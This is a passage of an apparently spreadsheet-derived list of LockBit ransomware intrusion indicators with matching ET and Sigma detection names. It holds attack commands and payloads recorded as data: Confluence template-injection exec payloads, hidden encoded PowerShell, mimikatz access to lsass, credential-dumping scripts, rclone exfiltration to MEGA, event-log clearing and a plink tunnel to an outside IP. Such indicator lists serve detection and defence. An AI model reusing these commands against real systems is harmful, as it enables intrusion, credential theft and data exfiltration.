    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0006"/>
    <s v="anydesk-pid, curl-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;curl http://92.51.2.22:8088/AnyDesk.msi -OutFile AnyDesk.msi&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0007"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0008"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;, &quot;http_content&quot;: &quot;write((new freemarker.temlate.utility.Execute()).exec({\&quot;whoami\&quot;}))&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0009"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;, &quot;http_content&quot;: &quot;write((new freemarker.temlate.utility.Execute()).exec({\&quot;net user\&quot;}))&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0010"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;python-requests/2.25.1&quot;, &quot;http_content&quot;: &quot;write((new freemarker.temlate.utility.Execute()).exec({\&quot;query user\&quot;}))&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0011"/>
    <s v="mshta-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e &lt;encoded string&gt;&quot;,  &quot;process_name&quot;: &quot;powershell.exe&quot;, &quot;initiating_process_name&quot;: &quot;mshta.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0012"/>
    <s v="mshta-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_name&quot;: &quot;C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\IE\UsySLX1n[1].hta&quot;, &quot;initiating_file_name&quot;: &quot;mshta.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0013"/>
    <s v="anydesk-pid, pshell-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;powershell -c (New-Object Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.msi', 'AnyDesk.msi')&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0014"/>
    <s v="netclt-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;net user &lt;accountname&gt; &lt;password&gt; /add&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0015"/>
    <s v="netclt-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;net localgroup &lt;accountname&gt;  /add&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0016"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimidrv.sys&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0017"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimikatz.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0018"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimilib.dll&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0019"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimilove.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0020"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\Win32\mimispool.dll&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0021"/>
    <s v="rclone-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\rclone\rclone.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0022"/>
    <s v="pdq-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\pdq.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0023"/>
    <s v="netscan-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\scanner\netscan.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0024"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;wevutil el&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0025"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;wevutil cl &lt;log name&gt;&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0026"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;process_access&quot;, &quot;initiating_process_file_name&quot;: &quot;mimikatz.exe&quot;, &quot;file_name&quot;: &quot;lsass.exe&quot;, &quot;access_grant&quot;: &quot;0x1010&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0027"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;powershell -f  Veeam-Get-Creds-New.ps1&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0028"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\passwords.txt&quot;, &quot;initiating_file_name&quot;: &quot;mimikatz.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0029"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;taskkill /f&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0030"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;taskkill /im&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0031"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;tasklist&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0032"/>
    <s v="netclit-pid"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process&quot;, &quot;process_command_line&quot;: &quot;net group \&quot;domain admins\&quot; .domain&quot;, &quot;device_type&quot;: &quot;domain controller&quot;}"/>
    <s v="Mistyped "/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0033"/>
    <s v="netclt-pid"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process&quot;, &quot;process_command_line&quot;: &quot;net group \&quot;domain admins&quot; /domain&quot;, &quot;device_type&quot;: &quot;domain controller&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0034"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;query user&quot;, &quot;device_type&quot;: &quot;domain controller&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0035"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_name&quot;: &quot;delete.me&quot;}"/>
    <s v="When NetScan is Executed with 'Check for write access' option enabled 'delete.me' file is created then deleted"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0036"/>
    <s v="netscan-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;netscan.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0037"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;netscan.lic&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0038"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;netscan.xml&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0039"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimidrv.sys&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0040"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimikatz.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0041"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimilib.dll&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0042"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimilove.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0043"/>
    <s v="mimikatz-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\mimikatz\x64\mimispool.dll&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0044"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\LBB.exe&quot;}"/>
    <s v="Lockbit binary"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0045"/>
    <s v="rclone-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;rclone --config=rclone.conf copy c:\&lt;directory&gt; mega:FTP&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0046"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;http_post&quot;: &quot;/template/aui/text-inline.vm HTTP/1.1&quot;, &quot;http_user_agent&quot;: &quot;rclone/v1.64.2&quot;, &quot;http_host&quot;: &quot;&lt;random&gt;.userstorage.mega.co.nz&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0047"/>
    <s v="anydesk-pid, pdq-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\pdq.exe&quot;, &quot;initiating_file_name&quot;: &quot;AnyDeskMSI.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0048"/>
    <s v="anydesk-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;file_created&quot;, &quot;file_path&quot;: &quot;C:\temp\LBB.exe&quot;, &quot;initiating_file_name&quot;: &quot;AnyDeskMSI.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0049"/>
    <m/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;cmd.exe /s / asd.bat&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0050"/>
    <s v="cmd-pid"/>
    <s v="object"/>
    <s v="{&quot;process_command_line&quot;: &quot;start cmd /k \&quot;C:\temp\LBB.exe -path \&quot;\\&lt;host&gt;\C$&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0051"/>
    <m/>
    <s v="etpro"/>
    <s v="ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1_x000a_ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers_x000a_ET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1_x000a_ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)_x000a_ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl_x000a_ET HUNTING PE EXE Download over raw TCP_x000a_ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1_x000a_ET INFO Dotted Quad Host HTA Request_x000a_ET INFO User-Agent (python-requests) Inbound to Webserver_x000a_ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)_x000a_ET POLICY Possible HTA Application Download_x000a_ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199_x000a_ET WEB_CLIENT PowerShell call in script 1_x000a_ET WEB_CLIENT PowerShell call in script 2_x000a_ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request Body_x000a_ET WEB_SERVER WebShell Generic - net user_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1_x000a_ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2_x000a_ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1_x000a_ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)_x000a_ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard Ports_x000a_ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP_x000a_ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0052"/>
    <m/>
    <s v="sigma"/>
    <s v="cd951fdc-4b2f-47f5-ba99-a33bf61e3770 : Always Install Elevated Windows Installer"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0053"/>
    <m/>
    <s v="sigma"/>
    <s v="e32d4572-9826-4738-b651-95fa63747e8a : Base64 Encoded PowerShell Command Detected"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0054"/>
    <m/>
    <s v="sigma"/>
    <s v="7d9263bd-dc47-4a58-bc92-5474abab390c    :       Change Winevt Channel Access Permission Via Registry"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0055"/>
    <m/>
    <s v="sigma"/>
    <s v="2f78da12-f7c7-430b-8b19-a28f269b77a3    :       Disable Windows Event Logging Via Registry"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0056"/>
    <m/>
    <s v="sigma"/>
    <s v="fcddca7c-b9c0-4ddf-98da-e1e2d18b0157    :       Disabled Windows Defender Eventlog"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0057"/>
    <m/>
    <s v="sigma"/>
    <s v="61065c72-5d7d-44ef-bf41-6a36684b545f    :       Elevated System Shell Spawned"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0058"/>
    <m/>
    <s v="sigma"/>
    <s v="98767d61-b2e8-4d71-b661-e36783ee24c1    :       Gzip Archive Decode Via PowerShell"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0059"/>
    <m/>
    <s v="sigma"/>
    <s v="a642964e-bead-4bed-8910-1bb4d63e3b4d    :       HackTool - Mimikatz Execution"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0060"/>
    <m/>
    <s v="sigma"/>
    <s v="502b42de-4306-40b4-9596-6f590c81f073    :       Local Accounts Discovery"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0061"/>
    <m/>
    <s v="sigma"/>
    <s v="f26c6093-6f14-4b12-800f-0fcb46f5ffd0    :       Malicious Base64 Encoded PowerShell Keywords in Command Lines"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0062"/>
    <m/>
    <s v="sigma"/>
    <s v="183e7ea8-ac4b-4c23-9aec-b3dac4e401ac    :       Net.EXE Execution"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0063"/>
    <m/>
    <s v="sigma"/>
    <s v="cd219ff3-fa99-45d4-8380-a7d15116c6dc    :       New User Created Via Net.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0064"/>
    <m/>
    <s v="sigma"/>
    <s v="f4bbd493-b796-416e-bbf2-121235348529    :       Non Interactive PowerShell Process Spawned"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0065"/>
    <m/>
    <s v="sigma"/>
    <s v="d679950c-abb7-43a6-80fb-2a480c4fc450    :       PDQ Deploy Remote Adminstartion Tool Execution"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0066"/>
    <m/>
    <s v="sigma"/>
    <s v="d7bcd677-645d-4691-a8d4-7a5602b780d1    :       Potential PowerShell Command Line Obfuscation"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0067"/>
    <m/>
    <s v="sigma"/>
    <s v="8e0bb260-d4b2-4fff-bb8d-3f82118e6892    :       Potentially Suspicious CMD Shell Output Redirect"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0068"/>
    <m/>
    <s v="sigma"/>
    <s v="fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c    :       PowerShell Base64 Encoded FromBase64String Cmdlet"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0069"/>
    <m/>
    <s v="sigma"/>
    <s v="3b6ab547-8ec2-4991-b9d2-2b06702a48d7    :       PowerShell Download Pattern"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0070"/>
    <m/>
    <s v="sigma"/>
    <s v="6e897651-f157-4d8f-aaeb-df8151488385    :       PowerShell Web Download"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0071"/>
    <m/>
    <s v="sigma"/>
    <s v="86085955-ea48-42a2-9dd3-85d4c36b167d    :       Process Terminated Via Taskkill"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0072"/>
    <m/>
    <s v="sigma"/>
    <s v="b52e84a3-029e-4529-b09b-71d19dd27e94    :       Remote Access Tool - AnyDesk Execution"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0073"/>
    <m/>
    <s v="sigma"/>
    <s v="b98d0db6-511d-45de-ad02-e82a98729620    :       Remotely Hosted HTA File Executed Via Mshta.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0074"/>
    <m/>
    <s v="sigma"/>
    <s v="2aa0a6b4-a865-495b-ab51-c28249537b75    :       Startup Folder File Write"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0075"/>
    <m/>
    <s v="sigma"/>
    <s v="88872991-7445-4a22-90b2-a3adadb0e827    :       Stop Windows Service Via Net.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0076"/>
    <m/>
    <s v="sigma"/>
    <s v="590a5f4c-6c8c-4f10-8307-89afe9453a9d    :       Suspicious Child Process Created as System"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0077"/>
    <m/>
    <s v="sigma"/>
    <s v="7be5fb68-f9ef-476d-8b51-0256ebece19e    :       Suspicious Execution of Hostname"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0078"/>
    <s v="pshell-pid"/>
    <s v="sigma"/>
    <s v="fb843269-508c-4b76-8b8d-88679db22ce7    :       Suspicious Execution of Powershell with Base64"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0079"/>
    <s v="curl-pid"/>
    <s v="sigma"/>
    <s v="5cb299fc-5fb1-4d07-b989-0644c68b6043    :       Suspicious File Download From IP Via Curl.EXE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0080"/>
    <s v="pshell-pid"/>
    <s v="sigma"/>
    <s v="d75d6b6b-adb9-48f7-824b-ac2e786efe1f    :       Suspicious FromBase64String Usage On Gzip Archive - Process Creation"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0081"/>
    <s v="mshta-pid"/>
    <s v="sigma"/>
    <s v="03cc0c25-389f-4bf8-b48d-11878079f1ca    :       Suspicious MSHTA Child Process"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0082"/>
    <m/>
    <s v="sigma"/>
    <s v="754ed792-634f-40ae-b3bc-e0448d33f695    :       Suspicious PowerShell Parent Process"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0083"/>
    <m/>
    <s v="sigma"/>
    <s v="2617e7ed-adb7-40ba-b0f3-8f9945fe6c09    :       Suspicious SYSTEM User Process Creation"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0084"/>
    <m/>
    <s v="sigma"/>
    <s v="63332011-f057-496c-ad8d-d2b6afb27f96    :       Suspicious Tasklist Discovery Command"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0085"/>
    <m/>
    <s v="sigma"/>
    <s v="ce72ef99-22f1-43d4-8695-419dcb5d9330    :       Suspicious Windows Service Tampering"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0086"/>
    <m/>
    <s v="sigma"/>
    <s v="d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6    :       Unusually Long PowerShell CommandLine"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0087"/>
    <m/>
    <s v="sigma"/>
    <s v="e28a5a99-da44-436d-b7a0-2afc20a5f413    :       Whoami Utility Execution"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0088"/>
    <m/>
    <s v="sigma"/>
    <s v="8de1cbe8-d6f5-496d-8237-5f44a721c7a0    :       Whoami.EXE Execution Anomaly"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0089"/>
    <m/>
    <s v="sigma"/>
    <s v="79ce34ca-af29-4d0e-b832-fc1b377020db    :       Whoami.EXE Execution From Privileged Process"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0090"/>
    <m/>
    <s v="sigma"/>
    <s v="671bb7e3-a020-4824-a00e-2ee5b55f385e    :       WMI Module Loaded By Uncommon Process"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0091"/>
    <m/>
    <s v="cmdline"/>
    <s v="echo enter |c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 &lt;username&gt;@168.100.9[.]137 -pw &lt;password&gt;"/>
    <s v="plink forwarding"/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0092"/>
    <m/>
    <s v="file_path"/>
    <s v="c:\windows\servicehost.exe"/>
    <s v="plink renamed"/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0093"/>
    <m/>
    <s v="htool"/>
    <s v="screenconnect"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0094"/>
    <m/>
    <s v="htool"/>
    <s v="splashtop"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0095"/>
    <m/>
    <s v="htool"/>
    <s v="zoho assist"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0096"/>
    <m/>
    <s v="htool"/>
    <s v="fixme it "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0097"/>
    <s v="anydesk-pid"/>
    <s v="htool"/>
    <s v="anydesk"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0098"/>
    <m/>
    <s v="htool"/>
    <s v="atera"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0099"/>
    <m/>
    <s v="htool"/>
    <s v="action1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0100"/>
    <s v="psexec-pid"/>
    <s v="htool"/>
    <s v="psexec"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0101"/>
    <m/>
    <s v="htool"/>
    <s v="adrecon"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0102"/>
    <m/>
    <s v="htool"/>
    <s v="impacket"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0103"/>
    <m/>
    <s v="htool"/>
    <s v="secretsdump.py"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0104"/>
    <m/>
    <s v="htool"/>
    <s v="veeam-get-creds.ps1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0105"/>
    <s v="procdump-pid"/>
    <s v="htool"/>
    <s v="procdump"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0106"/>
    <s v="mimikatz-pid"/>
    <s v="htool"/>
    <s v="mimikatz"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0107"/>
    <s v="lsass-pid"/>
    <s v="file_path"/>
    <s v="c:\perflogs\lsass.dmp "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0108"/>
    <m/>
    <s v="file_path"/>
    <s v="c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0109"/>
    <m/>
    <s v="file_path"/>
    <s v="c:\perflogs\processhacker.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0110"/>
    <m/>
    <s v="file_path"/>
    <s v="c:\users\&lt;username&gt;\downloads\process hacker 2\peview.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0111"/>
    <m/>
    <s v="cmdline"/>
    <s v="secretsdump.py &lt;domain&gt;/&lt;username&gt;@&lt;ip&gt; -outputfile 1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0112"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698618133[.]54 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0113"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0114"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c query user 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0115"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0116"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c cd 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0117"/>
    <s v="netscan-pid"/>
    <s v="htool"/>
